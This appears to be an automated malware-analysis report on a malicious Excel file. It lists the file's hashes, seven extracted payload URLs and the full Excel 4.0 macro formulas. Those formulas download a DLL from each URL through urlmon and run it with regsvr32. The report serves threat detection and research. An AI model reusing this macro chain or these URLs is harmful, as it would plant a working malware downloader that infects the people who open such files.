General
-
Target
8a0014db58e4dbe0c5c04df312d821562ceb9c775dda4b5732a98a7eb565a54e
-
Size
21KB
-
MD5
fd9d495fc5d299e32918897058941b68
-
SHA1
8e2c6dada269df9bdc141d05d803766f7e606a15
-
SHA256
8a0014db58e4dbe0c5c04df312d821562ceb9c775dda4b5732a98a7eb565a54e
-
SHA512
52a7ea04ca8610a4ca6257a4b3374c112df480a7bd5a7a84b65c7592f82b3f23d8700083d2534e4a670acd21412e2ee4ddbf81aae5e57ea316bf6fd0b74bef95
-
SSDEEP
384:CAuAi/NjNMS8EibbwBlw7SYrLb5CzgObff9kC+xbX75zSCCD:CosNRSzXnFCBn9kC+xbL5eH
Malware Config
Extracted
https://www.bodyuppatientlift.com/cgi-bin/EetvDjAbvFD/
http://www.bmamone.com/88vKqPdoeC6c7mG/
http://bimbelui.com/ujianonline/qXg/
http://www.arkpp.com/ARIS-BSU/cf0r3V6j5M3uSUI/
http://blog.raceng.com.br/wp-includes/HncXOVGXHu4/
https://www.bovito.hu/modules/ihNZzatAdWd67ATz/
http://ballabhbhaisahab.com/cgj-bin/EFP7HOwsOGIQq/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.bodyuppatientlift.com/cgi-bin/EetvDjAbvFD/","..\rfs.dll",0,0) =IF('PCWV'!G13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.bmamone.com/88vKqPdoeC6c7mG/","..\rfs.dll",0,0)) =IF('PCWV'!G15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bimbelui.com/ujianonline/qXg/","..\rfs.dll",0,0)) =IF('PCWV'!G17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arkpp.com/ARIS-BSU/cf0r3V6j5M3uSUI/","..\rfs.dll",0,0)) =IF('PCWV'!G19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blog.raceng.com.br/wp-includes/HncXOVGXHu4/","..\rfs.dll",0,0)) =IF('PCWV'!G21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.bovito.hu/modules/ihNZzatAdWd67ATz/","..\rfs.dll",0,0)) =IF('PCWV'!G23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ballabhbhaisahab.com/cgj-bin/EFP7HOwsOGIQq/","..\rfs.dll",0,0)) =IF('PCWV'!G25<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
8a0014db58e4dbe0c5c04df312d821562ceb9c775dda4b5732a98a7eb565a54e